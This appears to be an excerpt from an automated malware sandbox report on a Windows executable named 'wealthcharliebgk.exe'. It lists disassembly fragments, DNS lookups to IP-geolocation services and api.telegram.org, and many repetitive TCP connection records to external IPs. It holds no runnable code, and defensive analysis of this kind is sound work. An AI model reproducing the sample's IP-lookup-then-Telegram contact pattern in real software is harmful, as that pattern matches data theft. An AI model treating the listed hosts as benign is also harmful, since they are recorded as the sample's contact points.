                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CF3A2h8_2_005CF0A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C1571h8_2_005C12A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CC89Ah8_2_005CC5A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E033Ah8_2_005E0040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E330Ah8_2_005E3010
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E1B22h8_2_005E1828
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E37D2h8_2_005E34D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E1FEAh8_2_005E1CF0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E1192h8_2_005E0E98
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E297Ah8_2_005E2680
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E2E42h8_2_005E2B48
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E165Ah8_2_005E1360
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E0802h8_2_005E0508
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E0CCAh8_2_005E09D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E24B3h8_2_005E21B8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005E3C9Ah8_2_005E39A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A24D29h8_2_00A24A80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A28149h8_2_00A27EA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2F579h8_2_00A2F2A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A28E51h8_2_00A28BA8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A29B59h8_2_00A298B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2D429h8_2_00A2D180
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A25A31h8_2_00A25788
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2E1C5h8_2_00A2DE88
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A26739h8_2_00A26490
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A27441h8_2_00A27198
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A25E89h8_2_00A25BE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2E7B1h8_2_00A2E4E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A26B91h8_2_00A268E8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A27899h8_2_00A275F0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A285A1h8_2_00A282F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2B169h8_2_00A2AEC0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A23771h8_2_00A234C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2BE71h8_2_00A2BBC8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2CB7Bh8_2_00A2C8D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A24479h8_2_00A241D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A25181h8_2_00A24ED8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2D881h8_2_00A2D5D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2C2C9h8_2_00A2C020
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A23BC9h8_2_00A23920
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2CFD1h8_2_00A2CD28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A248D1h8_2_00A24628
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A255D9h8_2_00A25330
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2DCD9h8_2_00A2DA30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A262E1h8_2_00A26038
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A292A9h8_2_00A29000
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2F0E1h8_2_00A2EE10
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2B5C1h8_2_00A2B318
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2AD11h8_2_00A2AA68
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2BA19h8_2_00A2B770
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A23319h8_2_00A23070
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A24021h8_2_00A23D78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2C721h8_2_00A2C478
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2EC49h8_2_00A2E978
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2FA11h8_2_00A2F740
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A26FE9h8_2_00A26D40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A27CF1h8_2_00A27A48
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A289F9h8_2_00A28750
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A29701h8_2_00A29458
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A529CE
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A55F28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A55F38
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A52B00
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A52A50
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
